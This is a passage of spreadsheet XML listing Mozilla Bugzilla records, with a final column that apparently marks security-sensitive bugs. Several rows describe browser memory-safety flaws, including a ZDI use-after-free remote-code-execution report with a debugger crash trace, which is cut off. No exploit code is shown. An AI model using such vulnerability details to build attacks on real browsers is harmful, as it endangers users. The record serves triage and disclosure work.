        <v>15</v>
      </c>
      <c r="W5390" t="inlineStr">
        <is>
          <t>Steps to reproduce:
When compiling Firefox with cfi-derived-cast, crashtest layout/svg/crashtests/267650-1.svg fails due to the downcasting here:
https://searchfox.org/mozilla-central/rev/daf613efc5c358f3a94961d73b90472c00703838/layout/svg/SVGUtils.cpp#1525
The dynamic type of `aFrame-&gt;GetContent()` is `nsTextNode`, which is not derived from `SVGElement`.
This might not be s-s, just flagging as a precaution.</t>
        </is>
      </c>
      <c r="X5390" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5391">
      <c r="A5391" t="n">
        <v>1225618</v>
      </c>
      <c r="B5391" t="inlineStr">
        <is>
          <t>2015-11-17 13:11:21 -0800</t>
        </is>
      </c>
      <c r="C5391" t="inlineStr">
        <is>
          <t>Reentrance from TimelineMarker during cycle collection</t>
        </is>
      </c>
      <c r="D5391" t="inlineStr">
        <is>
          <t>2016-07-02 11:33:04 -0700</t>
        </is>
      </c>
      <c r="E5391" t="n">
        <v>1</v>
      </c>
      <c r="F5391" t="n">
        <v>1</v>
      </c>
      <c r="G5391" t="n">
        <v>3</v>
      </c>
      <c r="H5391" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5391" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5391" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5391" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5391" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5391" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5391" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5391" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5391" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5391" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5391" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T5391" t="n">
        <v>1</v>
      </c>
      <c r="U5391" t="n">
        <v>0</v>
      </c>
      <c r="V5391" t="n">
        <v>13</v>
      </c>
      <c r="W5391" t="inlineStr">
        <is>
          <t>Here is what looks to be going on in bug 1224880, based on the stack: something triggers a GC, which calls into CycleCollectedJSRuntime::OnGC(). We're apparently in the middle of an incremental CC, so we want to finish the CC before we start the GC, so we call nsCycleCollector::FinishAnyCurrentCollection(). This triggers the AutoGlobalTimelineMarker, which calls js::SavedStacks::saveCurrentStack(), which tries to create a new object, which ends up triggering a new GC, so we call back into CycleCollectedJSRuntime::OnGC(), which ends up failing to finish the current CC because we are running it nested, causing the assertion.
I'm not sure what the right fix here is. It looks like this landed in bug 1141614.</t>
        </is>
      </c>
      <c r="X5391" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5392">
      <c r="A5392" t="n">
        <v>1146770</v>
      </c>
      <c r="B5392" t="inlineStr">
        <is>
          <t>2015-03-23 22:22:54 -0700</t>
        </is>
      </c>
      <c r="C5392" t="inlineStr">
        <is>
          <t>implement comment preview</t>
        </is>
      </c>
      <c r="D5392" t="inlineStr">
        <is>
          <t>2019-10-15 15:57:57 -0700</t>
        </is>
      </c>
      <c r="E5392" t="n">
        <v>1</v>
      </c>
      <c r="F5392" t="n">
        <v>1</v>
      </c>
      <c r="G5392" t="n">
        <v>7</v>
      </c>
      <c r="H5392" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5392" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5392" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K5392" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5392" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5392" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5392" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5392" t="inlineStr"/>
      <c r="Q5392" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5392" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5392" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5392" t="n">
        <v>1</v>
      </c>
      <c r="U5392" t="n">
        <v>0</v>
      </c>
      <c r="V5392" t="n">
        <v>6</v>
      </c>
      <c r="W5392" t="inlineStr">
        <is>
          <t>comment previewing isn't implemented on the modal bug view.</t>
        </is>
      </c>
      <c r="X5392" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5393">
      <c r="A5393" t="n">
        <v>109771</v>
      </c>
      <c r="B5393" t="inlineStr">
        <is>
          <t>2001-11-12 11:20:46 -0800</t>
        </is>
      </c>
      <c r="C5393" t="inlineStr">
        <is>
          <t>netscape.com - extra space before GUB ('the hat') toolbar.</t>
        </is>
      </c>
      <c r="D5393" t="inlineStr">
        <is>
          <t>2015-04-19 23:39:42 -0700</t>
        </is>
      </c>
      <c r="E5393" t="n">
        <v>1</v>
      </c>
      <c r="F5393" t="n">
        <v>1</v>
      </c>
      <c r="G5393" t="n">
        <v>6</v>
      </c>
      <c r="H5393" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5393" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J5393" t="inlineStr">
        <is>
          <t>English US</t>
        </is>
      </c>
      <c r="K5393" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5393" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5393" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5393" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5393" t="inlineStr"/>
      <c r="Q5393" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5393" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5393" t="inlineStr">
        <is>
          <t>Feb</t>
        </is>
      </c>
      <c r="T5393" t="n">
        <v>1</v>
      </c>
      <c r="U5393" t="n">
        <v>0</v>
      </c>
      <c r="V5393" t="n">
        <v>7</v>
      </c>
      <c r="W5393" t="inlineStr">
        <is>
          <t>Build ID: 2001-11-12-03
Summary: my.netscape.com - extra space before GUB ('the hat') toolbar.
Steps to Reproduce:
1.  Look at http://my.netscape.com
Expected Results:
There shouldn't be what appears to be a &lt;br&gt; before the insert of the GUB ('the
hat') navigation toolbar.
Actual Results:
While this works in IE 4.x/5.x/6.x and Netscape Communicatior 4.x, this fails in
the latest nightly Mozilla build.</t>
        </is>
      </c>
      <c r="X5393" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5394">
      <c r="A5394" t="n">
        <v>621460</v>
      </c>
      <c r="B5394" t="inlineStr">
        <is>
          <t>2010-12-26 13:33:50 -0800</t>
        </is>
      </c>
      <c r="C5394" t="inlineStr">
        <is>
          <t>Requesting additional try test runs</t>
        </is>
      </c>
      <c r="D5394" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5394" t="n">
        <v>1</v>
      </c>
      <c r="F5394" t="n">
        <v>1</v>
      </c>
      <c r="G5394" t="n">
        <v>5</v>
      </c>
      <c r="H5394" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5394" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5394" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5394" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5394" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5394" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5394" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5394" t="inlineStr">
        <is>
          <t>tryrequest</t>
        </is>
      </c>
      <c r="Q5394" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5394" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5394" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5394" t="n">
        <v>1</v>
      </c>
      <c r="U5394" t="n">
        <v>0</v>
      </c>
      <c r="V5394" t="n">
        <v>2</v>
      </c>
      <c r="W5394" t="inlineStr">
        <is>
          <t>Please run three more "Rev3 MacOSX Snow Leopard 10.6.2 tryserver opt test mochitest-other" on http://hg.mozilla.org/try/rev/98f18e58733b / http://ftp.mozilla.org/pub/mozilla.org/firefox/tryserver-builds/philringnalda@gmail.com-98f18e58733b/try-osx64/
Thanks!</t>
        </is>
      </c>
      <c r="X5394" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5395">
      <c r="A5395" t="n">
        <v>740595</v>
      </c>
      <c r="B5395" t="inlineStr">
        <is>
          <t>2012-03-29 14:09:56 -0700</t>
        </is>
      </c>
      <c r="C5395" t="inlineStr">
        <is>
          <t>"Assertion failure: [infer failure] Missing type pushed 0:"</t>
        </is>
      </c>
      <c r="D5395" t="inlineStr">
        <is>
          <t>2013-03-11 07:26:46 -0700</t>
        </is>
      </c>
      <c r="E5395" t="n">
        <v>1</v>
      </c>
      <c r="F5395" t="n">
        <v>1</v>
      </c>
      <c r="G5395" t="n">
        <v>3</v>
      </c>
      <c r="H5395" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5395" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5395" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5395" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5395" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5395" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5395" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5395" t="inlineStr">
        <is>
          <t>[sg:critical][qa!] js-triage-needed</t>
        </is>
      </c>
      <c r="Q5395" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5395" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5395" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T5395" t="n">
        <v>1</v>
      </c>
      <c r="U5395" t="n">
        <v>0</v>
      </c>
      <c r="V5395" t="n">
        <v>18</v>
      </c>
      <c r="W5395" t="inlineStr">
        <is>
          <t>Created attachment 610679
stack
XMLList.prototype.(Function)
asserts js debug shell on m-c changeset 92fe907ddac8 with -m, -a and -n at Assertion failure: [infer failure] Missing type pushed 0: [0xf7400180],
s-s because infer failures are bad, assuming worse case [sg:critical].
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   76042:b769a2b79e6b
user:        Brian Hackett
date:        Fri Jul 15 10:14:07 2011 -0700
summary:     [INFER] Lazily create type objects for singleton JS objects, bug 670185.</t>
        </is>
      </c>
      <c r="X5395" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5396">
      <c r="A5396" t="n">
        <v>109048</v>
      </c>
      <c r="B5396" t="inlineStr">
        <is>
          <t>2001-11-08 06:26:22 -0800</t>
        </is>
      </c>
      <c r="C5396" t="inlineStr">
        <is>
          <t>can not create attachments</t>
        </is>
      </c>
      <c r="D5396" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E5396" t="n">
        <v>1</v>
      </c>
      <c r="F5396" t="n">
        <v>1</v>
      </c>
      <c r="G5396" t="n">
        <v>4</v>
      </c>
      <c r="H5396" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5396" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5396" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5396" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L5396" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5396" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5396" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5396" t="inlineStr"/>
      <c r="Q5396" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5396" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5396" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5396" t="n">
        <v>1</v>
      </c>
      <c r="U5396" t="n">
        <v>0</v>
      </c>
      <c r="V5396" t="n">
        <v>11</v>
      </c>
      <c r="W5396" t="inlineStr">
        <is>
          <t>i already logged in when i created a new bug. after that, i wanted to add
an attachment, but after filling in the form to create an attachment, 
when i clicked 'commit', it says:
The name &lt;TT&gt;&lt;/TT&gt; is not a valid username.  Either you
misspelled it, or the person has not registered for a
Bugzilla account.
&lt;P&gt;Please hit the &lt;B&gt;Back&lt;/B&gt; button and try again.
i've tried both with last mozilla, and IE 5.0</t>
        </is>
      </c>
      <c r="X5396" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5397">
      <c r="A5397" t="n">
        <v>14775</v>
      </c>
      <c r="B5397" t="inlineStr">
        <is>
          <t>1999-09-23 15:06:23 -0700</t>
        </is>
      </c>
      <c r="C5397" t="inlineStr">
        <is>
          <t>[PP][BLOCKER] Crash removing delete observer when closing windows</t>
        </is>
      </c>
      <c r="D5397" t="inlineStr">
        <is>
          <t>1999-12-20 23:07:29 -0800</t>
        </is>
      </c>
      <c r="E5397" t="n">
        <v>1</v>
      </c>
      <c r="F5397" t="n">
        <v>1</v>
      </c>
      <c r="G5397" t="n">
        <v>3</v>
      </c>
      <c r="H5397" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5397" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5397" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5397" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5397" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M5397" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N5397" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5397" t="inlineStr">
        <is>
          <t>Fix in hand</t>
        </is>
      </c>
      <c r="Q5397" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5397" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5397" t="inlineStr">
        <is>
          <t>M10</t>
        </is>
      </c>
      <c r="T5397" t="n">
        <v>1</v>
      </c>
      <c r="U5397" t="n">
        <v>0</v>
      </c>
      <c r="V5397" t="n">
        <v>21</v>
      </c>
      <c r="W5397" t="inlineStr">
        <is>
          <t>There are a number of different situations that seem to cause this or a similar
crash, when closing windows. One reproducible case is:
1. Start apprunner in the editor.
2. Type stuff.
3. Choose Quit menu item.
4. Click the Don't Save button. Now you'll crash.
Stack looks like:
 Calling chain using A6/R1 links
  Back chain  ISA  Caller
  00000000    PPC  1FB3D680
  0BA3A540    PPC  1FB39DE8  main+0013C
  0BA3A4D0    PPC  1FB3998C  main1(int, char**)+004C4
  0BA3A3D0    PPC  1E4F9620  nsAppShellService::Run()+00020
  0BA3A390    PPC  1E2E1298  nsAppShell::Run()+00050
  0BA3A310    PPC  1E2E203C  nsMacMessagePump::DoMessagePump()+00044
  0BA3A2C0    PPC  1E2E2240  nsMacMessagePump::DispatchEvent(int, EventRecord*)+
00084
  0BA3A270    PPC  1E2E24F8  nsMacMessagePump::DoMouseDown(EventRecord&amp;)+00084
  0BA3A180    PPC  1E2E2E28  nsMacMessagePump::DoMenu(EventRecord&amp;, long)+0004C
  0BA3A140    PPC  1E2E3140
nsMacMessagePump::DispatchMenuCommandToRaptor(EventRecord&amp;, long
)+00050
  0BA3A100    PPC  1E2DC6DC  nsMacMessageSink::DispatchMenuCommand(EventRecord&amp;,
long)+00050
  0BA3A0C0    PPC  1E2D5B20  nsMacWindow::HandleMenuCommand(EventRecord&amp;, long)+
00054
  0BA3A060    PPC  1E2D650C  nsMacEventHandler::HandleMenuCommand(EventRecord&amp;,
long)+001D4
  0BA39FA0    PPC  1E2BDE7C  nsWindow::DispatchWindowEvent(nsGUIEvent&amp;)+00028
  0BA39F60    PPC  1E2BDD68  nsWindow::DispatchEvent(nsGUIEvent*, nsEventStatus&amp;
)+00088
  0BA39F10    PPC  1E2CD47C  nsMenuBar::MenuSelected(const nsMenuEvent&amp;)+0009C
  0BA39EC0    PPC  1E2C86C0  nsMenu::MenuItemSelected(const nsMenuEvent&amp;)+002AC
  0BA39CC0    PPC  1E2CFB88  nsMenuItem::MenuItemSelected(const nsMenuEvent&amp;)+
00050
  0BA39C80    PPC  1E2D03C8  nsMenuItem::DoCommand()+0063C
  0BA39B70    PPC  1E2539E4  RDFElementImpl::HandleDOMEvent(nsIPresContext&amp;,
nsEvent*, nsIDOM
Event**, unsigned int, nsEventStatus&amp;)+00480
  0BA39A30    PPC  1C5E6CEC  nsEventListenerManager::HandleEvent(nsIPresContext&amp;,
nsEvent*, n
sIDOMEvent**, unsigned int, nsEventStatus&amp;)+01780
  0BA398E0    PPC  1D6FB8C0  nsJSEventListener::HandleEvent(nsIDOMEvent*)+001AC
  0BA397C0    PPC  1D67FD6C  nsJSContext::CallFunction(void*, void*, unsigned
int, void*, int
*)+002B4
  0BA396F0    PPC  1D602E48  JS_CallFunction+00044
  0BA396B0    PPC  1D620748  js_InternalCall+000CC
  0BA39600    PPC  1D62049C  js_Invoke+00974
  0BA39500    PPC  1D629388  js_Interpret+082FC
  0BA39180    PPC  1D62049C  js_Invoke+00974
  0BA39080    PPC  1D629388  js_Interpret+082FC
  0BA38D00    PPC  1D620438  js_Invoke+00910
  0BA38C00    PPC  1CA40CE4  WrappedNative_CallMethod(JSContext*, JSObject*,
unsigned int, lo
ng*, long*)+00170
  0BA38B80    PPC  1CA3EE38
nsXPCWrappedNativeClass::CallWrappedMethod(JSContext*, nsXPCWrap
pedNative*, const XPCNativeMemberDescriptor*, nsXPCWrappedNativeClass::CallMode,
unsigned int
, long*, long*)+00E00
  0BA38950    PPC  1D7DAEA0  XPTC_InvokeByIndex+0002C
  0BA38910    PPC  1D7DAFA8  _XPTC_InvokeByIndex+000C8
  0BA3886C    PPC  1E1A1918  nsEditorShell::Exit()+00084
  0BA3881C    PPC  1E4F989C  nsAppShellService::Quit()+00234
  0BA3875C    PPC  1D695870  GlobalWindowImpl::Close()+00038
  0BA3871C    PPC  1E4FC884  nsWebShellWindow::Close()+00038
  0BA386CC    PPC  1E4D9548  nsWebShell::Destroy()+001FC
  0BA3863C    PPC  1E4D785C  nsWebShell::DestroyChildren()+0006C
  0BA385EC    PPC  1E4D9534  nsWebShell::Destroy()+001E8
  0BA3855C    PPC  1C809EDC  DocumentViewerImpl::Release()+00070
  0BA3851C    PPC  1C80A204  DocumentViewerImpl::~DocumentViewerImpl()+000C0
  0BA384BC    PPC  1D691C74  GlobalWindowImpl::SetNewDocument(nsIDOMDocument*)+
00218
  0BA383CC    PPC  1D6807B0  nsJSContext::GC()+00018
  0BA3838C    PPC  1D5FDB5C  JS_GC+00048
  0BA3834C    PPC  1D61E560  js_ForceGC+0003C
  0BA3830C    PPC  1D61EC0C  js_GC+00668
  0BA3824C    PPC  1D633EF8  js_FinalizeObject+000E8
  0BA381FC    PPC  1D7486F8  FinalizeUIEvent(JSContext*, JSObject*)+0001C
  0BA381BC    PPC  1D72A788  nsJSUtils::nsGenericFinalize(JSContext*, JSObject*)+
000A0
  0BA3816C    PPC  1C5E0F9C  nsDOMEvent::Release()+00070
  0BA3812C    PPC  1C5E0DB0  nsDOMEvent::~nsDOMEvent()+00058
  0BA380EC    PPC  1C52D2DC  nsPresContext::Release()+0006C
  0BA380AC    PPC  1C52C530  GalleyContext::~GalleyContext()+00030
  0BA3806C    PPC  1C52D108  nsPresContext::~nsPresContext()+001F8
  0BA3801C    PPC  1C5E7728  nsEventStateManager::Release()+00070
  0BA37FDC    PPC  1C5E75AC  nsEventStateManager::~nsEventStateManager()+001A8
  0BA37F9C    PPC  1E2D15E4  nsBaseWidget::Release()+00070
  0BA37F5C    PPC  1E2EC9DC  nsChildWindow::~nsChildWindow()+0003C
  0BA37F1C    PPC  1E2BAC14  nsWindow::~nsWindow()+00268
The crash happens in nsMacEventHandler::~nsMacEventHandler(), when calling
RemoveDeleteObserver  on mLastWidgetPointed.</t>
        </is>
      </c>
      <c r="X5397" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5398">
      <c r="A5398" t="n">
        <v>1037641</v>
      </c>
      <c r="B5398" t="inlineStr">
        <is>
          <t>2014-07-11 13:55:40 -0700</t>
        </is>
      </c>
      <c r="C5398" t="inlineStr">
        <is>
          <t>Mozilla Firefox DirectionalityUtils Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-2394)</t>
        </is>
      </c>
      <c r="D5398" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:43 -0700</t>
        </is>
      </c>
      <c r="E5398" t="n">
        <v>1</v>
      </c>
      <c r="F5398" t="n">
        <v>1</v>
      </c>
      <c r="G5398" t="n">
        <v>3</v>
      </c>
      <c r="H5398" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5398" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5398" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K5398" t="inlineStr">
        <is>
          <t>30 Branch</t>
        </is>
      </c>
      <c r="L5398" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5398" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N5398" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5398" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main32+][adv-esr31.1+][adv-esr24.8+]</t>
        </is>
      </c>
      <c r="Q5398" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5398" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5398" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T5398" t="n">
        <v>1</v>
      </c>
      <c r="U5398" t="n">
        <v>0</v>
      </c>
      <c r="V5398" t="n">
        <v>25</v>
      </c>
      <c r="W5398" t="inlineStr">
        <is>
          <t>ZDI-CAN-2394: Mozilla Firefox DirectionalityUtils Use-After-Free Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
HP's Zero Day Initiative has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Verified against Firefox 30.0 Stable on Windows 8.1 as well as the latest nightly as of July 1st.
```
(f48.9c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=095712b0 ebx=0c0c0000 ecx=0ddc2600 edx=0ddc2600 esi=0ddc2600 edi=0c0c0000
eip=095712b0 esp=00b1dcd8 ebp=00b1dd04 iopl=0         nv up ei ng nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010287
095712b0 27              daa
0:000&gt; kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
00b1dcd4 60526d2c 00b1dcf0 00000002 0ddc2600 0x95712b0
00b1dd04 60cfa9f3 00000001 0abb15b0 08712801 xul!mozilla::dom::Element::UpdateState+0x16c (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\element.cpp @ 182]
00b1dd18 61181bbc 00000002 60e78875 0abb15b0 xul!mozilla::dom::Element::SetDirectionality+0x79a803 (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\mozilla\dom\element.h @ 325]
00b1dd20 60e78875 0abb15b0 00b1dd50 00000002 xul!mozilla::nsTextNodeDirectionalityMap::SetNodeDirection+0x14 (FPO: [2,0,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\directionalityutils.cpp @ 494]
00b1dd34 60ed1d0f 0abb15b0 61181ba8 00b1dd50 xul!nsCheapSet&lt;nsPtrHashKey&lt;mozilla::dom::Element&gt; &gt;::EnumerateEntries+0x2b (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dist\include\nscheapsets.h @ 68]
00b1dd44 60fe2c7c 0abb15b0 00000002 60d24b09 xul!mozilla::nsTextNodeDirectionalityMap::UpdateAutoDirection+0x13 (FPO: [2,0,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\directionalityutils.cpp @ 530]
00b1dd50 60d24b09 08712840 00000002 00b1df1c xul!mozilla::nsTextNodeDirectionalityMap::UpdateTextNodeDirection+0x14 (FPO: [2,0,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\directionalityutils.cpp @ 571]
00b1deb4 611b700b 08712840 00000002 102b9f58 xul!nsGenericDOMDataNode::SetTextInternal+0x853d19 (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\nsgenericdomdatanode.cpp @ 320]
00b1decc 611b7133 00000000 00000002 00b1df1c xul!nsGenericDOMDataNode::ReplaceData+0x1d (FPO: [3,0,4]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\nsgenericdomdatanode.cpp @ 267]
00b1dee4 611b72c2 08712840 00000000 00000002 xul!nsGenericDOMDataNode::ReplaceData+0x15 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\content\base\src\nsgenericdomdatanode.h @ 220]
00b1df38 6064c573 0c1e2e40 00b1df74 08712840 xul!mozilla::dom::CharacterDataBinding::replaceData+0xef (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\dom\bindings\characterdatabinding.cpp @ 281]
00b1df74 636f88f0 0c1e2e40 00000003 00000028 xul!mozilla::dom::GenericBindingMethod+0xc3 (FPO: [3,6,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\bindings\bindingutils.cpp @ 2278]
00b1e270 636f9c16 0c1e2e40 00000000 00b1e2e0 mozjs!js::Invoke+0x2d0 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 476]
00b1e320 636d483b 0c1e2e40 00b1e398 00b1e388 mozjs!js::Invoke+0x216 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\vm\interpreter.cpp @ 532]
00b1e3c4 00b1e43c 2580513d 0c1e2e40 00b1e48c mozjs!js::jit::DoCallFallback+0x1eb (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jit\baselineic.cpp @ 8138]
00b1e3e0 00b1e3ec 00b1e3ec 00000000 ffffff82 0xb1e43c
00b1e4e8 636e0879 2c1230d4 00000001 00b1f4e0 0xb1e3ec
00b1e550 6377a18b 0c1e2e40 00b1f188 00000003 mozjs!EnterBaseline+0xe9 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jit\baselinejit.cpp @ 123]
00b1e5b4 636f488e 0f02c62a 0c1e2e40 08c8e800 mozjs!js::jit::EnterBaselineAtBranch+0x17b (FPO: [1,22,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\js\src\jit\baselinejit.cpp @ 207]
